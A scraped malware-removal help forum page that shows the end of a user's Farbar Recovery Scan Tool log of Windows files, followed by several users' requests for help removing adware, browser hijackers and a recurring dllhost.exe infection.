2014-10-14 22:52 - 2014-07-06 17:40 - 00195584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioSes.dll
2014-10-14 22:52 - 2014-07-06 17:40 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2014-10-14 22:52 - 2014-07-06 17:40 - 00143872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2014-10-14 22:52 - 2014-07-06 17:40 - 00103424 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2014-10-14 22:52 - 2014-07-06 17:40 - 00081408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsp.dll
2014-10-14 22:52 - 2014-07-06 17:40 - 00008192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\spwmp.dll
2014-10-14 22:52 - 2014-07-06 17:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msdxm.ocx
2014-10-14 22:52 - 2014-07-06 17:40 - 00004096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxmasf.dll
2014-10-14 22:52 - 2014-07-06 17:39 - 12625408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmploc.DLL
2014-10-14 22:52 - 2014-07-06 17:39 - 03970488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2014-10-14 22:52 - 2014-07-06 17:39 - 03914680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2014-10-14 22:52 - 2014-07-06 17:39 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rrinstaller.exe
2014-10-14 22:52 - 2014-07-06 17:39 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfpmp.exe
2014-10-14 22:52 - 2014-07-06 17:37 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mferror.dll
2014-10-14 22:52 - 2014-06-27 16:21 - 00619056 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2014-10-14 22:52 - 2014-06-27 16:21 - 00532176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2014-10-14 22:52 - 2014-06-27 16:21 - 00457400 _____ (Microsoft Corporation) C:\Windows\system32\ci.dll
2014-10-14 22:52 - 2014-06-18 14:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-14 22:52 - 2014-06-18 14:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-14 22:52 - 2014-06-18 14:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-14 22:52 - 2014-06-18 14:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-14 22:52 - 2014-06-18 14:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-14 22:52 - 2014-06-18 14:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-14 22:51 - 2014-10-09 18:05 - 00507392 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-14 22:51 - 2014-10-09 18:05 - 00276480 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-14 22:51 - 2014-10-09 18:00 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-14 22:51 - 2014-10-06 18:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-14 22:51 - 2014-10-06 18:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-14 22:51 - 2014-09-25 14:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-14 22:51 - 2014-09-25 14:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-14 22:51 - 2014-09-25 14:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-14 22:51 - 2014-09-25 14:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-14 22:51 - 2014-09-25 14:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-14 22:51 - 2014-09-25 14:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-14 22:51 - 2014-09-25 14:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-14 22:51 - 2014-09-18 18:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-14 22:51 - 2014-09-18 17:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-14 22:51 - 2014-09-18 17:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-14 22:51 - 2014-09-18 17:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-14 22:51 - 2014-09-18 17:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-14 22:51 - 2014-09-18 17:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-14 22:51 - 2014-09-18 17:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-14 22:51 - 2014-09-18 17:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-14 22:51 - 2014-09-18 17:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-14 22:51 - 2014-09-18 17:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-14 22:51 - 2014-09-18 17:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-14 22:51 - 2014-09-18 17:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-14 22:51 - 2014-09-18 17:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-14 22:51 - 2014-09-18 17:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-14 22:51 - 2014-09-18 17:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-14 22:51 - 2014-09-18 17:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-14 22:51 - 2014-09-18 17:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-14 22:51 - 2014-09-18 17:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-14 22:51 - 2014-09-18 17:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-14 22:51 - 2014-09-18 17:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-14 22:51 - 2014-09-18 17:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-14 22:51 - 2014-09-18 17:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-14 22:51 - 2014-09-18 17:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-14 22:51 - 2014-09-18 17:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-14 22:51 - 2014-09-18 17:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-14 22:51 - 2014-09-18 17:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-14 22:51 - 2014-09-18 16:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-14 22:51 - 2014-09-18 16:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-14 22:51 - 2014-09-18 16:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-14 22:51 - 2014-09-18 16:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-14 22:51 - 2014-09-18 16:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-14 22:51 - 2014-09-18 16:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-14 22:51 - 2014-09-18 16:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-14 22:51 - 2014-09-18 16:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-14 22:51 - 2014-09-18 16:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-14 22:51 - 2014-09-18 16:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-14 22:51 - 2014-09-18 16:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-14 22:51 - 2014-09-18 16:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-14 22:51 - 2014-09-18 16:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-14 22:51 - 2014-09-18 16:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-14 22:51 - 2014-09-18 16:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-14 22:51 - 2014-09-18 16:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-14 22:51 - 2014-09-18 16:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-14 22:51 - 2014-09-18 15:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-14 22:51 - 2014-09-18 15:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-14 22:51 - 2014-09-18 15:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-14 22:51 - 2014-09-18 15:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-14 22:51 - 2014-09-17 18:00 - 03241472 _____ (Microsoft Corporation) 
C:\Windows\system32\msi.dll 2014-10-14 22:51 - 2014-09-17 17:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll 2014-10-14 22:51 - 2014-07-16 18:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll 2014-10-14 22:51 - 2014-07-16 18:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe 2014-10-14 22:51 - 2014-07-16 18:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll 2014-10-14 22:51 - 2014-07-16 18:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe 2014-10-14 22:51 - 2014-07-16 18:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll 2014-10-14 22:51 - 2014-07-16 18:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll 2014-10-14 22:51 - 2014-07-16 18:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll 2014-10-14 22:51 - 2014-07-16 18:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll 2014-10-14 22:51 - 2014-07-16 17:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll 2014-10-14 22:51 - 2014-07-16 17:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll 2014-10-14 22:51 - 2014-07-16 17:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe 2014-10-14 22:51 - 2014-07-16 17:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll 2014-10-14 22:51 - 2014-07-16 17:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll 2014-10-14 22:51 - 2014-07-16 17:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll 2014-10-14 22:51 - 2014-07-16 17:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys 2014-10-14 22:51 - 2014-07-16 17:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys 2014-10-14 22:50 - 2014-09-12 17:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll 
2014-10-14 22:50 - 2014-09-12 17:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll 2014-10-14 22:50 - 2014-09-03 21:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll 2014-10-14 22:50 - 2014-09-03 21:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll 2014-10-13 07:47 - 2014-10-13 07:47 - 01652435 _____ () C:\Users\Ryan\Downloads\Files(1).zip ==================== One Month Modified Files and Folders ======= (If an entry is included in the fixlist, the file\folder will be moved.) 2014-11-12 16:18 - 2013-01-17 14:19 - 00000000 __HDC () C:\ProgramData\~1 2014-11-12 16:17 - 2011-05-23 10:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Native Instruments 2014-11-12 16:16 - 2013-05-25 12:16 - 00000000 __HDC () C:\ProgramData\~0 2014-11-12 16:15 - 2013-06-02 10:37 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Image-Line 2014-11-12 16:15 - 2013-06-02 10:37 - 00000000 ____D () C:\Program Files (x86)\Image-Line 2014-11-12 16:15 - 2012-01-27 16:29 - 00000000 ____D () C:\Program Files\Native Instruments 2014-11-12 16:13 - 2013-10-25 14:12 - 00000000 ____D () C:\ProgramData\Camel Audio 2014-11-12 16:13 - 2013-10-25 14:12 - 00000000 ____D () C:\Program Files (x86)\Camel Audio 2014-11-12 16:13 - 2013-10-18 16:04 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Camel Audio 2014-11-12 16:12 - 2011-09-14 21:32 - 00000000 ____D () C:\Program Files (x86)\Google 2014-11-12 16:06 - 2011-09-14 21:32 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2014-11-12 15:52 - 2012-11-16 20:30 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Skype 2014-11-12 15:50 - 2010-06-24 19:21 - 00000000 ____D () C:\Users\Ryan\AppData\Local\CrashDumps 2014-11-12 15:46 - 2014-04-07 08:59 - 00000536 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-3275123363-4289498944-2812251985-1000.job 2014-11-12 15:26 - 2012-04-04 08:18 - 
00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job 2014-11-12 15:02 - 2009-07-13 20:45 - 00018736 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2014-11-12 15:02 - 2009-07-13 20:45 - 00018736 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2014-11-12 14:59 - 2010-02-26 06:30 - 01777953 _____ () C:\Windows\WindowsUpdate.log 2014-11-12 14:55 - 2012-05-18 16:13 - 00000000 ___RD () C:\Users\Ryan\Dropbox 2014-11-12 14:55 - 2012-05-18 16:10 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Dropbox 2014-11-12 14:54 - 2013-12-12 17:00 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Spotify 2014-11-12 14:51 - 2010-01-15 09:10 - 02397924 _____ () C:\Windows\PFRO.log 2014-11-12 14:51 - 2009-07-13 21:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT 2014-11-12 14:51 - 2009-07-13 20:51 - 00043030 _____ () C:\Windows\setupact.log 2014-11-12 11:18 - 2014-02-14 16:54 - 00000000 ____D () C:\Users\Ryan\Desktop\Pics 2014-11-12 08:09 - 2009-07-13 19:20 - 00000000 ____D () C:\Windows\Speech 2014-11-12 03:37 - 2010-04-03 16:55 - 00000000 ____D () C:\Program Files (x86)\QuickBooks Online Backup 2014-11-11 17:47 - 2014-09-27 15:37 - 00000000 ____D () C:\Users\Ryan\AppData\Local\NPE 2014-11-11 17:26 - 2014-09-27 15:39 - 00000000 ____D () C:\NPE 2014-11-11 16:48 - 2010-03-20 12:07 - 00003918 _____ () C:\Windows\System32\Tasks\User_Feed_Synchronization-{27FAE3BD-BE82-405C-8E7D-DB50733813FF} 2014-11-11 13:26 - 2012-04-04 08:18 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe 2014-11-11 13:26 - 2012-04-04 08:18 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater 2014-11-11 13:26 - 2011-05-23 18:06 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl 2014-11-11 10:38 - 2014-08-14 07:50 - 04246016 ___SH () C:\Users\Ryan\Desktop\Thumbs.db 2014-11-11 10:19 - 2014-08-21 13:42 
- 00003180 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForRyan 2014-11-11 10:19 - 2014-08-21 13:42 - 00000328 _____ () C:\Windows\Tasks\HPCeeScheduleForRyan.job 2014-11-11 08:53 - 2014-07-22 18:01 - 00000000 ____D () C:\Program Files (x86)\Mozilla Maintenance Service 2014-11-11 08:44 - 2013-12-12 17:00 - 00000000 ____D () C:\Users\Ryan\AppData\Local\Spotify 2014-11-09 01:22 - 2014-04-07 08:59 - 00003562 _____ () C:\Windows\System32\Tasks\G2MUpdateTask-S-1-5-21-3275123363-4289498944-2812251985-1000 2014-11-08 22:23 - 2013-08-22 20:28 - 578582455 _____ () C:\Windows\MEMORY.DMP 2014-11-08 22:23 - 2013-08-22 20:28 - 00000000 ____D () C:\Windows\Minidump 2014-11-07 08:16 - 2010-03-23 11:17 - 00000000 ____D () C:\Users\Ryan\AppData\Local\Adobe 2014-11-07 08:06 - 2010-03-23 11:56 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\Apple Computer 2014-11-06 14:56 - 2010-04-04 15:46 - 00000052 _____ () C:\Windows\SysWOW64\DOErrors.log 2014-11-05 12:20 - 2009-07-13 21:13 - 00782510 _____ () C:\Windows\system32\PerfStringBackup.INI 2014-11-04 14:03 - 2014-08-26 08:03 - 00002515 _____ () C:\Users\Public\Desktop\Skype.lnk 2014-11-04 14:03 - 2014-08-26 08:03 - 00000000 ___RD () C:\Program Files (x86)\Skype 2014-11-04 14:03 - 2012-11-16 20:30 - 00000000 ____D () C:\ProgramData\Skype 2014-11-04 11:22 - 2013-05-19 16:04 - 00000000 ____D () C:\Users\Ryan\.thinkorswim 2014-11-04 11:22 - 2010-05-10 07:52 - 00000000 ____D () C:\Program Files (x86)\thinkorswim 2014-11-03 14:45 - 2012-06-01 17:36 - 04150784 ___SH () C:\Users\Ryan\Downloads\Thumbs.db 2014-11-03 13:40 - 2010-03-20 15:18 - 00000000 ____D () C:\Users\Ryan\Tracing 2014-11-03 12:59 - 2010-03-23 11:54 - 00000000 ____D () C:\Program Files\Common Files\Apple 2014-11-03 12:58 - 2013-03-15 14:48 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69 2014-11-03 12:10 - 2011-05-23 17:52 - 00000000 ____D () C:\Users\Ryan\AppData\Local\Windows Live 2014-11-03 12:09 - 2011-05-23 17:56 - 00000000 ___RD () 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live 2014-11-03 12:08 - 2012-11-17 11:26 - 00001376 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Photo Gallery.lnk 2014-11-03 12:07 - 2011-05-23 17:55 - 00001460 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live Mail.lnk 2014-11-03 12:07 - 2010-01-15 09:44 - 00000000 ____D () C:\Program Files (x86)\Windows Live 2014-11-03 12:06 - 2012-11-17 11:25 - 00000000 ____D () C:\Program Files\Windows Live 2014-11-03 12:04 - 2010-01-15 09:48 - 00033369 _____ () C:\Windows\DirectX.log 2014-11-03 10:49 - 2010-03-19 14:58 - 00000000 ____D () C:\Users\Ryan 2014-11-03 09:49 - 2010-03-23 11:54 - 00000000 ____D () C:\ProgramData\Apple 2014-10-31 09:09 - 2010-03-20 12:25 - 00000544 _____ () C:\Windows\Tasks\PCDRScheduledMaintenance.job 2014-10-29 01:09 - 2013-06-06 16:09 - 00002185 _____ () C:\Users\Public\Desktop\Google Chrome.lnk 2014-10-28 19:09 - 2011-11-10 12:57 - 00000000 _____ () C:\Windows\system32\HP_ActiveX_Patch_NOT_DETECTED.txt 2014-10-21 16:01 - 2011-09-14 21:32 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA 2014-10-21 16:01 - 2011-09-14 21:32 - 00003642 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore 2014-10-21 16:01 - 2011-09-14 21:32 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2014-10-16 15:14 - 2012-06-18 21:32 - 00000000 ____D () C:\Program Files (x86)\ATT-SST 2014-10-15 07:27 - 2009-07-13 21:09 - 00000000 ____D () C:\Windows\System32\Tasks\WPD 2014-10-15 03:24 - 2009-07-13 19:20 - 00000000 ____D () C:\Windows\rescache 2014-10-15 02:46 - 2009-07-13 20:45 - 04981328 _____ () C:\Windows\system32\FNTCACHE.DAT 2014-10-15 02:43 - 2014-05-06 14:15 - 00000000 ___SD () C:\Windows\system32\CompatTel 2014-10-15 02:43 - 2009-07-13 19:20 - 00000000 ____D () C:\Windows\SysWOW64\Dism 2014-10-15 02:43 - 2009-07-13 19:20 - 00000000 ____D () C:\Windows\system32\Dism 2014-10-15 02:20 - 2010-03-23 11:06 - 00000000 ____D 
() C:\ProgramData\Microsoft Help 2014-10-15 02:15 - 2013-08-14 02:02 - 00000000 ____D () C:\Windows\system32\MRT 2014-10-15 02:01 - 2010-03-20 12:19 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe Some content of TEMP: ==================== C:\Users\Ryan\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmpxsol3s.dll C:\Users\Ryan\AppData\Local\Temp\ICReinstall_Free_Download_Setup(1).exe C:\Users\Ryan\AppData\Local\Temp\ose00000.exe ==================== Bamital & volsnap Check ================= (There is no automatic fix for files that do not pass verification.) C:\Windows\System32\winlogon.exe => File is digitally signed C:\Windows\System32\wininit.exe => File is digitally signed C:\Windows\SysWOW64\wininit.exe => File is digitally signed C:\Windows\explorer.exe => File is digitally signed C:\Windows\SysWOW64\explorer.exe => File is digitally signed C:\Windows\System32\svchost.exe => File is digitally signed C:\Windows\SysWOW64\svchost.exe => File is digitally signed C:\Windows\System32\services.exe => File is digitally signed C:\Windows\System32\User32.dll => File is digitally signed C:\Windows\SysWOW64\User32.dll => File is digitally signed C:\Windows\System32\userinit.exe => File is digitally signed C:\Windows\SysWOW64\userinit.exe => File is digitally signed C:\Windows\System32\rpcss.dll => File is digitally signed C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2014-11-05 00:31 ==================== End Of Log ============================ **NOTE**malawarebytes.txt Above is the first log, attached is log 1 and 2. I previously posted this same post in error with log 1 plus log 2 as a reply but this is the correction! Thanks!
  22. Hello, I was following along in another topic trying to remove Binkiland using FARBAR when I realized that the directions are specific to each user. I think I'm in over my head and I need some help. I downloaded FRST64 and it scanned and placed FRST and Addition to my desktop. Any help you can give me is appreciated. Thanks!
  23. Hello. Came on forum on October 28th with same issue. dllhost.exe running about 20 instances and eating up memory. Problem seemed fixed on October 28th through this forum, but it must have been buried deep because it is back. Noticed problems with my screen saver, Avira antivirus doing weird things and my wireless adapter flashing crazily. Checked Task Manager and sure enough, the dllhost.exe COM surrogate is replicating and bogging down my computer. I hope that's all it's doing..... Anyway, I ran the FARBAR utility and am attaching the FRST and ADDITION results to see if maybe someone can help get rid of this dang malware once and for all. In the meantime, I'm going to unhook from the internet until tomorrow to see if there's a reply from a moderator in case there's something nasty going on with this malware infection. Thanks, Todd. Addition.txt FRST.txt
  24. Struggling with a similar issue as the user that posted this question: https://forums.malwarebytes.org/index.php?/topic/161188-proxy-server-1270019880/
      Fiance somehow managed to d/l a virus I can't find much on. Not visible in Programs or Browser Extensions, but has completely hijacked all of my browsers by changing registry files.
      Ran the initial adwcleaner scan/clean. Turned up:
      File Deleted : C:\Users\Sauter\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.superfish.com_0.localstorage
      File Deleted : C:\Users\Sauter\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.superfish.com_0.localstorage-journal
      File Deleted : C:\Users\Sauter\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_inst.shoppingate.info_0.localstorage
      File Deleted : C:\Users\Sauter\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxps_inst.shoppingate.info_0.localstorage-journal
      File Deleted : C:\Users\Sauter\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.re-markable00.re-markable.net_0.localstorage
      File Deleted : C:\Users\Sauter\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_static.re-markable00.re-markable.net_0.localstorage-journal
      seemed to be the impetus behind running ads by SASA hijacked content
      After the adwcleaner scan, ran the advice from TwinHeadedEagle in the above referenced post but ran into a hiccup with the Farbar tool. Followed the advice, but any time I tried to run a fix, I get the following message followed by an autoshutdown of the Farbar tool: "Warning: Looks like you don't know what to do. To prevent damage to the system the tool will exit."
      How can I complete the process/fix? Do I need to attach my fixlist/addition .txt files and have a custom list made? Would that even work with this error message involved?
  25. Hi. The mb results.txt, and Farbar scan reports are attached. Please help. FRST.txt Addition.txt mb results.txt